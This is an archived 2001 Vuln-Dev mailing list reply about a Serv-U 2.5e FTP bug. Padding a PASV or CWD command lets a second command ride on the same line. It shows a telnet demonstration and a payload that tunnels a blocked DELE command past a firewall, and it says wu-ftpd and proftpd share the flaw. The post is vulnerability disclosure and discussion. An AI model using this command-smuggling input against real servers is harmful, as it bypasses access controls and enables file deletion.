Re: serv-u 2.5e

From: BORBELY Zoltan (bozo@andrews.hu)
Date: 07/24/01 

Date: Tue, 24 Jul 2001 09:48:12 +0200
From: BORBELY Zoltan <bozo@andrews.hu>
To: perkere stinker <doe_i_sorte_skodder@hotmail.com>
Subject: Re: serv-u 2.5e
Message-ID: <20010724094812.A786@dolphin.home>

On Mon, Jul 23, 2001 at 07:37:38PM +0000, perkere stinker wrote:
> log in, issue a PASV [buf] where buf is 507 bytes, after that you can issue
> a new command all in the same line. Can this be exploited anyway? Does it
> work on other versions? Is this pure crap? I dont know. Guess thats what
> vuln-dev is for?
>
> example:
>
> [foo@bar foo]$ telnet serv-u-server 21
> Trying 193.89.248.81...
> Connected to serv-u-server.
> Escape character is '^]'.
> 220 Serv-U FTP-Server v2.5e for WinSock ready...
> user perkere
> 331 User name okay, need password.
> pass stinker
> 230 User logged in, proceed.
> PASV
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACWD
> upload
> 227 Entering Passive Mode (193,89,248,81,7,177)
> 250 Directory changed to /f:/Download/upload
>
> End example

Is the command really important? I think I've discovered the same bug about
one year ago, but I had checked the wu-ftpd. This "feature" can be really bad.
E.g. you are using application level firewall and you configured your gateway
to disable the delete command. If the gateway doesn't check the proper line
termination (<CR><LF>) after the command you can tunnel a disabled command
inside an allowed command:

CWD AAAAAAAAAAAAAAAAAAAAAA[...]AAAAAAAAAAAADELE foo

I had sent a mail to CERT but nothing happened. I had no time that time so
the story had ended. I've checked to wu-ftpd and proftpd and both are affected.
I think most of the ftp daemons are affected.

It's very easy to implement this bad behaviour. The following pseudo C code
fragment will show a tipical bad approach:

        while ( fgets(buff,sizeof(buff),f) != NULL )
        {
            /* remove line termination if any */
            ...

            handle_command(buff);
        }

Relevant Pages

  • [PATCH 2/7] tpm: reorganize sysfs files - Updated patch
    ... different options and each command layed out in its own static const ... generalizing the array so there can be one array and the unique parts ... char *buf) ... char *str = buf; ...
    (Linux-Kernel)
  • Function to get system information
    ... I'm trying to find in AIX documentation an analog of Linux or Solaris function ... long sysinfo(int command, char *buf, long count). ...
    (comp.unix.aix)
  • serv-u 2.5e
    ... log in, issue a PASV [buf] where buf is 507 bytes, after that you can issue ... a new command all in the same line. ... 220 Serv-U FTP-Server v2.5e for WinSock ready... ...
    (Vuln-Dev)
  • Re: how to search a string in a few files
    ... > I dont know where the BUF variable is contained. ... > What command should I use? ... What editor or programming environment do you use? ... grep until all file names have been used up. ...
    (comp.unix.shell)
  • Re: [PATCH 2/7] tpm: reorganize sysfs files - Updated patch
    ... char *buf) ... different options and each command layed out in its own static const ... char *str = buf; ...
    (Linux-Kernel)